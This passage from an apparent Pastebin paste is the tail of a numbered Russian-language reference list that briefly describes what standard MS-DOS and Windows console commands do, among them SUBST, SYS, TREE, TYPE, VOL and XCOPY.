  488. SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва.
  489. SORT - Сортирует входной поток.
  490. START - Стартует отдельное окно для выполнения указанной программы или команды.
  491. SUBST - Связывает путь с литерой диска.
  492. SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
  493. TIME - Отображает или устанавливает системное время.
  494. TITLE - Устанавливает заголовок окна для сеанса.
  495. TREE - Графически отображает структуру директория в драйве или путь.
  496. TYPE - Отображает содержимое текстового файла.
  497. VER - Отображает версию Windows.
  498. VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск.
  499. VOL - Отображает метку дискового тома и серийный номер.
  500. XCOPY - Копирует файлы и деревья директории.
  501. 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!